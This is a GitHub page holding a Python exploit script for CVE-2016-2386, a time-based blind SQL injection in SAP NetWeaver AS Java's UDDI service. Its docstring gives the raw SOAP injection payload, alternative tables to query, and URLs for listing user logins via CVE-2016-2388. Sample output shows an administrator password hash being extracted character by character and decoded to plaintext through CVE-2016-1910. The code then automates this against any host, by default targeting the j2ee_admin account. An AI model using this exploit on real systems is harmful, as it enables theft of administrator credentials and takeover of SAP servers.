forked from vah13/SAP_exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathSQL_injection_CVE-2016-2386.py
More file actions
167 lines (137 loc) · 6.1 KB
/
Copy pathSQL_injection_CVE-2016-2386.py
File metadata and controls
167 lines (137 loc) · 6.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
#!/usr/bin/env python
# coding=utf-8
"""
Author: Vahagn Vardanyan https://twitter.com/vah_13
Bugs:
CVE-2016-2386 SQL injection
CVE-2016-2388 Information disclosure
CVE-2016-1910 Crypto issue
Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: nw74:50000
Content-Length: 500
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
<soapenv:Header/>
<soapenv:Body>
<sec:deletePermissionById>
<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
</sec:deletePermissionById>
</soapenv:Body>
</soapenv:Envelope>
In SAP test server I have admin user who login is "Administrator" and so I used this payload
%PRIVATE_DATASOURCE.un:Administrator%
most SAP's using j2ee_admin username for SAP administrator login
%PRIVATE_DATASOURCE.un:j2ee_admin%
You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)
1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#
Instead of J2EE_CONFIGENTRY table you can use this tables
UME_STRINGS_PERM
UME_STRINGS_ACTN
BC_DDDBDP
BC_COMPVERS
TC_WDRR_MRO_LUT
TC_WDRR_MRO_FILES
T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection
T_DOMAIN
T_SESSION
UME_ACL_SUP_PERM
UME_ACL_PERM
UME_ACL_PERM_MEM
An example of a working exploit
C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
this may take a few minutes
Found {SHA-512, 10000, 24}M
Found {SHA-512, 10000, 24}MT
Found {SHA-512, 10000, 24}MTI
Found {SHA-512, 10000, 24}MTIz
Found {SHA-512, 10000, 24}MTIzU
Found {SHA-512, 10000, 24}MTIzUV
Found {SHA-512, 10000, 24}MTIzUVd
Found {SHA-512, 10000, 24}MTIzUVdF
Found {SHA-512, 10000, 24}MTIzUVdFY
Found {SHA-512, 10000, 24}MTIzUVdFYX
Found {SHA-512, 10000, 24}MTIzUVdFYXN
Found {SHA-512, 10000, 24}MTIzUVdFYXNk
Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X
And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text
base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹ºX
"""
import argparse
import requests
import string
from rich.progress import track
#_dictionary = string.digits + string.uppercase + string.lowercase + string.punctuation + string.whitespace +
_dictionary = string.printable
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
def _get_timeout(_data):
return requests.post("{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port),
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 "
"Firefox/57.0",
"SOAPAction": "",
"Content-Type": "text/xml;charset=UTF-8"
},
data=_xml.format(_data)).elapsed.total_seconds()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
"--url",
required=True,
default=False,
help="https://target/ or https://127.0.0.1/",
)
parser.add_argument(
"-p",
"--port",
required=True,
default=80,
help="443",
)
parser.add_argument(
"-U",
"--user",
default="j2ee_admin",
help="Choose the user you want to target",
)
parser.add_argument('-v', "--verbose")
option = parser.parse_args()
host = option.url
port = option.port
user = option.user
_magic = "{SHA-512, 10000, 24}"
_wrong_magic = "{SHA-511, 10000, 24}"
_xml = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " \
"xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n " \
"<sec:deletePermissionById>\r\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \
"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:"+ user + "%' and UME_STRINGS.VAL like '%{" \
"0}%') AND '1'='1</permissionId>\r\n </sec:deletePermissionById>\r\n </soapenv:Body>\r\n</soapenv:Envelope> "
print ("start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host))
print ("Target: " + host)
print ("User targeted: " + user)
_hash = _magic
for i in range(24): # you can change it if like to get full hash
y = 0
for _char in track(_dictionary):
if not (option.verbose is None):
print ("checking {0}".format(_hash + _char))
if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server
_hash += _char
print ("Found " + _hash)
y += 1
if y == len(_dictionary):
print("Target doesn't seem vulnerable")
exit()